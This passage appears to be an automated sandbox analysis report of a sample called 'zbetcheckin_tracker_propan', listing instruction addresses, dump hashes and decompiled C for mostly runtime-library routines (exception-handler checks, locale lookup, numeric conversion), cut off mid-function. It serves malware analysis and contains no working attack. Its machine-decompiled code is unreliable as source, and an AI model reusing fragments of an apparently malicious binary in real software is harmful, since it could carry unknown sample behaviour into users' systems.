0x00414255
0x0041425b
0x00414268
0x0041426f
0x00414272
0x00414276
0x00414276
0x00414285
0x00414286
0x00414286
0x00414288
0x00414288
0x0041428a
0x00414294
0x00414294
0x00414294
0x0041428c
0x0041428e
0x0041428e
0x00414299
0x0041429a
0x0041429d
0x0041429d
0x00000000
0x00414288
0x00414087
0x0041408c
0x0041408d
0x0041408e
0x004142a1
0x004142a3
0x004142a5
0x004142a5
0x00413f4a
0x00413f4a
0x00413f4c
0x00413f4e
0x00413f54
0x00413f58
0x00000000
0x00413f5a
0x00413f5a
0x00413f5a
0x00000000
0x00413f58
0x00413f66
0x00413f67
0x00413f6a
0x00413f6b
0x00413f6b
0x00414406
0x00414408
0x00414416
0x00414420
0x00414426
0x0041442c
0x0041442e
0x00414434
0x00414437
0x00000000
0x00414437
0x0041443b
0x0041443e
0x00414443
0x00000000
0x00414443
0x00414448

Strings

, xrefs: 004143A1

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 8a9038f4292f5b1207dfd42d05664a8d5d717137d838deb8b609dcb433b41157
Instruction ID: ee01d1faeee44ef12e4e3cf103a29a5988aec0003df79e6e441c58099ca84b5c
Opcode Fuzzy Hash: 8a9038f4292f5b1207dfd42d05664a8d5d717137d838deb8b609dcb433b41157
Instruction Fuzzy Hash: 1702EB32E105199BDF04CF59D8403EDB7B2FBD8355F25C26ED926AB280C3746A86CB84

Function 0040318D, Relevance: 1.7, APIs: 1, Instructions: 195
nativeLIBRARYCODE

C-Code - Quality: 100%

			E0040318D(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x4054d0; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x405518 = 1;
										__eflags =  *0x405518;
										if( *0x405518 != 0) {
											goto L60;
										}
										_t84 =  *0x4054d0; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x405518 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x4054d0 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x4054d8 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x4054d4 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x4054d8 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x4054d8 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x405518 = 1;
							__eflags =  *0x405518;
							if( *0x405518 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x4054d8 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x4054d8 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x405518 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x4054d8 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x4054d0 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x4054d8 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x4054d8 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x00403197
0x0040319a
0x004031a0
0x004031be
0x00000000
0x004031be
0x004031a8
0x004031b1
0x004031b7
0x004031c6
0x004031c9
0x004031cc
0x004031d6
0x004031d6
0x004031d8
0x004031db
0x004031dd
0x004031dd
0x004031df
0x004031e2
0x00000000
0x00000000
0x004031e4
0x004031e6
0x0040324c
0x0040324c
0x004033aa
0x00000000
0x004033aa
0x004031e8
0x004031e8
0x004031ec
0x004031ee
0x004031ee
0x004031ee
0x004031ee
0x004031f1
0x004031f2
0x004031f5
0x004031f5
0x004031f9
0x004031fd
0x0040320b
0x0040320b
0x00403213
0x00403219
0x0040321b
0x0040321d
0x0040322d
0x0040323a
0x0040323e
0x00403243
0x00403245
0x004032c3
0x004032c3
0x00403247
0x00403247
0x00403247
0x004032c5
0x004032c7
0x004033a8
0x004033a8
0x00000000
0x004032cd
0x004032cd
0x004032d4
0x00000000
0x00000000
0x004032da
0x004032de
0x0040333a
0x0040333c
0x00403344
0x00403346
0x00403348
0x00000000
0x00000000
0x0040334a
0x00403350
0x00403352
0x00403354
0x00403369
0x00403369
0x0040336b
0x0040339a
0x004033a1
0x00000000
0x004033a1
0x0040336f
0x00403370
0x00403372
0x00403374
0x00403374
0x00403376
0x00403378
0x0040337a
0x0040338e
0x0040338e
0x00403391
0x00403393
0x00403393
0x00403394
0x00403394
0x00000000
0x0040337c
0x0040337c
0x0040337c
0x00403385
0x00403386
0x00403388
0x0040338a
0x0040338a
0x00000000
0x0040337c
0x0040337a
0x00403356
0x0040335d
0x0040335d
0x0040335f
0x00000000
0x00000000
0x00403361
0x00403362
0x00403365
0x00403367
0x00000000
0x00000000
0x00000000
0x00403367
0x00000000
0x0040335d
0x004032e0
0x004032e3
0x004032e8
0x00000000
0x00000000
0x004032f1
0x004032f3
0x004032f9
0x00000000
0x00000000
0x004032ff
0x00403305
0x00000000
0x00000000
0x0040330b
0x0040330d
0x00403316
0x0040331a
0x00000000
0x00000000
0x00403320
0x00403323
0x00403325
0x00000000
0x00000000
0x0040332c
0x0040332e
0x00000000
0x00000000
0x00403330
0x00403334
0x00000000
0x00000000
0x00000000
0x00403334
0x00000000
0x00000000
0x00000000
0x0040321f
0x0040321f
0x0040321f
0x00403226
0x00000000
0x00000000
0x00403228
0x00403229
0x0040322b
0x00000000
0x00000000
0x00000000
0x0040322b
0x00403253
0x00403255
0x00000000
0x00000000
0x00403265
0x00403267
0x00403269
0x00000000
0x00000000
0x0040326f
0x00403276
0x004032a2
0x004032a2
0x004032a4
0x004032a6
0x004032ba
0x004032bc
0x00000000
0x00000000
0x00000000
0x00000000
0x004032a8
0x004032a8
0x004032a8
0x004032b1
0x004032b2
0x004032b4
0x004032b6
0x004032b6
0x00000000
0x004032a8
0x00403278
0x00403278
0x0040327b
0x0040327d
0x0040328f
0x0040328f
0x00403292
0x00403294
0x00403294
0x00403295
0x00403295
0x0040329b
0x0040329b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040327f
0x0040327f
0x0040327f
0x00403286
0x00000000
0x00000000
0x00403288
0x00403288
0x00403289
0x00000000
0x00000000
0x00000000
0x00403289
0x0040328b
0x0040328d
0x004032a0
0x00000000
0x00000000
0x00000000
0x004032a0
0x00000000
0x0040328d
0x004031ff
0x00403202
0x00403205
0x00000000
0x00000000
0x00403207
0x00403209
0x00000000
0x00000000
0x00000000
0x00403209
0x004031ce
0x004031d0
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL ref: 0040323E

Memory Dump Source

Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: acb388311d9507e765e57883f4f0fb462627ea4d4fd5b39d7bafb66c9a769686
Instruction ID: 78077c6edd7102824a81ad90397cfc8d0478216482ea5665405657b9022bdeaa
Opcode Fuzzy Hash: acb388311d9507e765e57883f4f0fb462627ea4d4fd5b39d7bafb66c9a769686
Instruction Fuzzy Hash: C761CB306106019FCB25CF29C9C076A7BA9EB95717B24857FD805EB2D4E738DE42875C

Function 004134B0, Relevance: 1.5, APIs: 1, Instructions: 26

APIs

GetLocaleInfoA.KERNEL32(?,00001004,?,00000006,?,?,?,?,?,?,?), ref: 004134D2

Part of subcall function 0040FE9A: IsDebuggerPresent.KERNEL32 ref: 00412B08
Part of subcall function 0040FE9A: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00412B1D
Part of subcall function 0040FE9A: UnhandledExceptionFilter.KERNEL32(004181C4), ref: 00412B28
Part of subcall function 0040FE9A: GetCurrentProcess.KERNEL32(C0000409), ref: 00412B44
Part of subcall function 0040FE9A: TerminateProcess.KERNEL32(00000000), ref: 00412B4B

Memory Dump Source

Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerInfoLocalePresentTerminate
String ID:
API String ID: 3162229498-0
Opcode ID: 917dc916ca7e34ff7e30c23fa1b53dfb2e25eb24efc0ba39e81883e36cf0dc12
Instruction ID: b4fad6471f6f340e46c7e6d4daddbad7cdec23d7ddf9036f4d6e5afb2c261bc1
Opcode Fuzzy Hash: 917dc916ca7e34ff7e30c23fa1b53dfb2e25eb24efc0ba39e81883e36cf0dc12
Instruction Fuzzy Hash: 53E09B30B08208AEDB11DFB4D845BDE77B8AF0C718F80417AF511D61D1D778D7448659

Function 004134B0, Relevance: 1.5, APIs: 1, Instructions: 26

C-Code - Quality: 89%

			E004134B0(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, int _a4) {
				signed int _v8;
				char _v10;
				char _v16;
				signed int _t7;
				signed int _t10;
				signed int _t12;
				intOrPtr _t14;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t20;
				signed int _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t18 = __edx;
				_t14 = __ebx;
				_t7 =  *0x42c4a0; // 0xe190ffa3
				_v8 = _t7 ^ _t21;
				_v10 = 0;
				_t10 = GetLocaleInfoA(_a4, 0x1004,  &_v16, 6);
				if(_t10 != 0) {
					_t12 = E00415F6F( &_v16);
				} else {
					_t12 = _t10 | 0xffffffff;
				}
				return E0040FE9A(_t12, _t14, _v8 ^ _t21, _t18, _t19, _t20);
			}

0x004134b0
0x004134b0
0x004134b0
0x004134b0
0x004134b6
0x004134bd
0x004134ce
0x004134d2
0x004134da
0x004134e5
0x004134dc
0x004134dc
0x004134dc
0x004134f6

APIs

GetLocaleInfoA.KERNEL32(7FFFFFFF,00001004,00000000,00000006,00000000,7FFFFFFF,00000000,?,?,?,00410C10,01D31728,?,?), ref: 004134D2

Part of subcall function 0040FE9A: IsDebuggerPresent.KERNEL32 ref: 00412B08
Part of subcall function 0040FE9A: SetUnhandledExceptionFilter.KERNEL32 ref: 00412B1D
Part of subcall function 0040FE9A: UnhandledExceptionFilter.KERNEL32(fC), ref: 00412B28
Part of subcall function 0040FE9A: GetCurrentProcess.KERNEL32(C0000409), ref: 00412B44
Part of subcall function 0040FE9A: TerminateProcess.KERNEL32(00000000), ref: 00412B4B

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerInfoLocalePresentTerminate
String ID:
API String ID: 3162229498-0
Opcode ID: 656ca1a91e6beee6f2877c3f0947bd718e00ffcf6520868461cacd17f74082df
Instruction ID: b4fad6471f6f340e46c7e6d4daddbad7cdec23d7ddf9036f4d6e5afb2c261bc1
Opcode Fuzzy Hash: 656ca1a91e6beee6f2877c3f0947bd718e00ffcf6520868461cacd17f74082df
Instruction Fuzzy Hash: 53E09B30B08208AEDB11DFB4D845BDE77B8AF0C718F80417AF511D61D1D778D7448659

Function 00402749, Relevance: 1.5, APIs: 1, Instructions: 11

C-Code - Quality: 37%

			E00402749(intOrPtr _a4, intOrPtr _a8) {
				void* _t3;
				intOrPtr* _t6;

				_t6 =  *0x40501c;
				_t3 = 0x7f;
				if(_t6 != 0) {
					return RtlNtStatusToDosError( *_t6(_a4, _a8));
				}
				return _t3;
			}

0x00402749
0x00402753
0x00402754
0x00000000
0x00402761
0x00402767

APIs

RtlNtStatusToDosError.NTDLL ref: 00402761

Memory Dump Source

Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ErrorStatus
String ID:
API String ID: 1596131371-0
Opcode ID: ee30a3aab0a8afbbbd2c55dcafa8b4b57ff950f5befaa10d6ea191f9ba838e5e
Instruction ID: f5cab280cc5f0981f9fdb10a19465466d077b01224edd2b38ec2dd1a7d3f75c5
Opcode Fuzzy Hash: ee30a3aab0a8afbbbd2c55dcafa8b4b57ff950f5befaa10d6ea191f9ba838e5e
Instruction Fuzzy Hash: BAC01271604201EBEA18AB21DE1D93FBA11FB90340F00442DB249A10F0C6749850DA15

Function 004160BE, Relevance: 1.4, Strings: 1, Instructions: 178

Strings

N@, xrefs: 004160D9

Memory Dump Source

Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID: N@
API String ID: 2579439406-1509896676
Opcode ID: d80ac28e40a82e2140494de85e0c141f2dfcabb1530c75b28e88de08726555fa
Instruction ID: 3422558f80033e691d449cf213abf6e5ddd7a077f490a086ba894b671f380026
Opcode Fuzzy Hash: d80ac28e40a82e2140494de85e0c141f2dfcabb1530c75b28e88de08726555fa
Instruction Fuzzy Hash: BA618C71A012268FCB18CF48C5945AAF7B2FF89304B5AC1AED9096B366C774DD81CBC4

Function 004160BE, Relevance: 1.4, Strings: 1, Instructions: 178
Crypto

C-Code - Quality: 78%

			E004160BE(char* _a4, intOrPtr _a8, unsigned int* _a12) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				unsigned int _v20;
				signed int _v24;
				unsigned int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t75;
				unsigned int* _t77;
				unsigned int _t80;
				unsigned int _t83;
				unsigned int _t84;
				unsigned int _t85;
				signed int _t87;
				signed int _t90;
				signed int _t100;
				signed int _t107;
				unsigned int _t108;
				unsigned int _t110;
				unsigned int _t111;
				signed int _t116;
				unsigned int _t118;
				unsigned int _t120;
				signed int _t122;
				intOrPtr _t123;
				unsigned int _t133;
				unsigned int _t135;
				unsigned int _t138;
				unsigned int _t145;
				void* _t146;
				unsigned int _t150;
				unsigned int _t151;
				signed int _t152;

				_t75 =  *0x42c4a0; // 0xe190ffa3
				_v8 = _t75 ^ _t152;
				_t77 = _a12;
				_t137 = 0;
				_v28 = 0x404e;
				 *_t77 = 0;
				_t77[1] = 0;
				_t77[2] = 0;
				if(_a8 <= 0) {
					L27:
					while(_t77[2] == _t137) {
						_t90 = _t77[1];
						_t77[2] = _t90 >> 0x10;
						_t116 =  *_t77;
						_t130 = _t116 >> 0x10;
						_t113 = _t116 << 0x10;
						_v28 = _v28 + 0xfff0;
						_t77[1] = _t90 << 0x00000010 | _t116 >> 0x00000010;
						 *_t77 = _t116 << 0x10;
					}
					if((_t77[2] & 0x00008000) != 0) {
						L30:
						_t77[2] = _v28;
						return E0040FE9A(_t77, 0x8000, _v8 ^ _t152, _t113, _t130, _t137);
					} else {
						goto L29;
					}
					do {
						L29:
						_t138 =  *_t77;
						_t130 = _t77[1];
						_v28 = _v28 + 0xffff;
						 *_t77 = _t138 + _t138;
						_t137 = _t130 + _t130 | _t138 >> 0x0000001f;
						_t113 = _t130 >> 0x1f;
						_t100 = _t77[2] + _t77[2] | _t130 >> 0x0000001f;
						_t77[1] = _t130 + _t130 | _t138 >> 0x0000001f;
						_t77[2] = _t100;
					} while ((0x00008000 & _t100) == 0);
					goto L30;
				} else {
					goto L1;
				}
				do {
					L1:
					_t118 =  *_t77;
					_t80 = _t77[1];
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t133 = _t118 + _t118;
					_t120 = _t80 + _t80 | _t118 >> 0x0000001f;
					_v24 = _t133;
					_v24 = _v24 & 0x00000000;
					_t107 = (_t77[2] + _t77[2] | _t80 >> 0x0000001f) + (_t77[2] + _t77[2] | _t80 >> 0x0000001f) | _t120 >> 0x0000001f;
					_t83 = _v20;
					_t145 = _t133 + _t133;
					_t122 = _t120 + _t120 | _t133 >> 0x0000001f;
					_t135 = _t145 + _t83;
					 *_t77 = _t145;
					_t77[1] = _t122;
					_t77[2] = _t107;
					if(_t135 < _t145 || _t135 < _t83) {
						_v24 = 1;
					}
					_t84 = 0;
					 *_t77 = _t135;
					if(_v24 != 0) {
						_t151 = _t122 + 1;
						if(_t151 < _t122 || _t151 < 1) {
							_t84 = 1;
						}
						_t77[1] = _t151;
						if(_t84 != 0) {
							_t77[2] = _t107 + 1;
						}
					}
					_t108 = _t77[1];
					_t123 = _v16;
					_t85 = _t108 + _t123;
					_t146 = 0;
					if(_t85 < _t108 || _t85 < _t123) {
						_t146 = 1;
					}
					_t77[1] = _t85;
					if(_t146 != 0) {
						_t77[2] = _t77[2] + 1;
					}
					_t77[2] = _t77[2] + _v12;
					_v24 = _v24 & 0x00000000;
					_t110 = _t135 + _t135;
					_t130 = _t85 + _t85 | _t135 >> 0x0000001f;
					_t87 = _t77[2] + _t77[2] | _t85 >> 0x0000001f;
					 *_t77 = _t110;
					_t77[1] = _t130;
					_t77[2] = _t87;
					_t113 =  *_a4;
					_t150 = _t110 + _t113;
					_v20 = _t113;
					if(_t150 < _t110 || _t150 < _t113) {
						_v24 = 1;
					}
					 *_t77 = _t150;
					if(_v24 != 0) {
						_t111 = _t130 + 1;
						if(_t111 < _t130 || _t111 < 1) {
							_t113 = 1;
						}
						_t77[1] = _t111;
						if(_t113 != 0) {
							_t77[2] = _t87 + 1;
						}
					}
					_a8 = _a8 - 1;
					_a4 = _a4 + 1;
				} while (_a8 > 0);
				_t137 = 0;
				goto L27;
			}

0x004160c4
0x004160cb
0x004160ce
0x004160d3
0x004160d9
0x004160e0
0x004160e2
0x004160e5
0x004160e8
0x00000000
0x00416234
0x0041620e
0x00416216
0x00416219
0x00416220
0x00416225
0x00416228
0x0041622f
0x00416232
0x00416232
0x00416241
0x00416273
0x00416277
0x00416289
0x00000000
0x00000000
0x00000000
0x00416243
0x00416243
0x00416243
0x00416245
0x00416248
0x00416256
0x0041625b
0x00416262
0x00416267
0x0041626b
0x0041626e
0x0041626e
0x00000000
0x00000000
0x00000000
0x00000000
0x004160ee
0x004160ee
0x004160ee
0x004160f0
0x004160f8
0x004160f9
0x004160fa
0x00416100
0x00416106
0x00416114
0x00416119
0x00416127
0x00416129
0x0041612c
0x00416130
0x00416132
0x00416137
0x00416139
0x0041613c
0x0041613f
0x00416145
0x00416145
0x0041614c
0x00416151
0x00416153
0x00416155
0x0041615a
0x00416163
0x00416163
0x00416166
0x00416169
0x0041616c
0x0041616c
0x00416169
0x0041616f
0x00416172
0x00416175
0x00416178
0x0041617c
0x00416184
0x00416184
0x00416187
0x0041618a
0x0041618c
0x0041618c
0x00416192
0x00416195
0x00416199
0x004161a4
0x004161b4
0x004161b6
0x004161b8
0x004161bb
0x004161be
0x004161c1
0x004161c6
0x004161c9
0x004161cf
0x004161cf
0x004161da
0x004161dc
0x004161de
0x004161e5
0x004161ee
0x004161ee
0x004161f1
0x004161f4
0x004161f7
0x004161f7
0x004161f4
0x004161fa
0x004161fd
0x00416200
0x0041620a
0x00000000

Strings

N@, xrefs: 004160D9

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID: N@
API String ID: 2579439406-1509896676
Opcode ID: 9fe50ee4c59856ef6abc79d150c0dfa5fe7e8f2f7ce7fd62ec84fea8bdbaea2c
Instruction ID: 3422558f80033e691d449cf213abf6e5ddd7a077f490a086ba894b671f380026
Opcode Fuzzy Hash: 9fe50ee4c59856ef6abc79d150c0dfa5fe7e8f2f7ce7fd62ec84fea8bdbaea2c
Instruction Fuzzy Hash: BA618C71A012268FCB18CF48C5945AAF7B2FF89304B5AC1AED9096B366C774DD81CBC4

Function 00250AFD, Relevance: 1.4, Strings: 1, Instructions: 145

Strings

.dll, xrefs: 00250C54

Memory Dump Source

Source File: 00000001.00000002.3011253056.0000000000250000.00000040.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_250000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID:
String ID: .dll
API String ID: 0-2738580789
Opcode ID: 135e0967f3cc20ca14d17b168d30b59c40d10e9d8b5e7183516c95ca34c9fdab
Instruction ID: 2e47b18815009eb9dddcda75f3901438b3a7e51aa741c7fc304c0736e1f7fbb2
Opcode Fuzzy Hash: 135e0967f3cc20ca14d17b168d30b59c40d10e9d8b5e7183516c95ca34c9fdab
Instruction Fuzzy Hash: 5E516D70920219DBCB24CF55C9C07AEB7B1FF0530BF10866AD8559B651D374AAA8CF98

Function 00290408, Relevance: 1.4, Strings: 1, Instructions: 145

Strings

.dll, xrefs: 0029055F

Memory Dump Source

Source File: 00000001.00000002.3011296226.0000000000290000.00000040.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_290000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID:
String ID: .dll
API String ID: 0-2738580789
Opcode ID: 135e0967f3cc20ca14d17b168d30b59c40d10e9d8b5e7183516c95ca34c9fdab
Instruction ID: 31e531697a6c85454f36deb3f876d9c8346eca16f1ad4544d61d93cb6ad23646
Opcode Fuzzy Hash: 135e0967f3cc20ca14d17b168d30b59c40d10e9d8b5e7183516c95ca34c9fdab
Instruction Fuzzy Hash: A9517B30A2021DEFCF24DF55C4C07ADB7B5BF04305F5181AAD949AB641D7B4AAA4CF94

Function 0040D4F0, Relevance: 1.4, Strings: 1, Instructions: 136
Crypto

C-Code - Quality: 76%

			E0040D4F0(intOrPtr __edx, signed int _a4, signed int* _a8, intOrPtr _a12) {
				signed int* _v0;
				intOrPtr _v4;
				char _v8;
				char _v12;
				signed int _v16;
				char _v17;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t58;
				signed int _t65;
				signed int _t66;
				signed int* _t69;
				intOrPtr _t70;
				signed int* _t77;
				signed int _t97;
				signed int _t109;
				signed int _t111;
				signed int _t114;
				signed int _t116;
				void* _t126;

				_t106 = __edx;
				_t77 = _a8;
				_t114 = _t77[2] ^  *0x42c4a0;
				_t55 =  *_t114;
				_v17 = 0;
				_v12 = 1;
				_t111 =  &(_t77[4]);
				if( *_t114 != 0xfffffffe) {
					E0040FE9A(_t55, _t77,  *((intOrPtr*)(_t114 + 4)) + _t111 ^  *(_t55 + _t111), __edx, _t111, _t114);
				}
				E0040FE9A( *((intOrPtr*)(_t114 + 8)), _t77,  *((intOrPtr*)(_t114 + 0xc)) + _t111 ^  *( *((intOrPtr*)(_t114 + 8)) + _t111), _t106, _t111, _t114);
				_t58 = _a4;
				if(( *(_t58 + 4) & 0x00000066) != 0) {
					__eflags = _t77[3] - 0xfffffffe;
					if(_t77[3] == 0xfffffffe) {
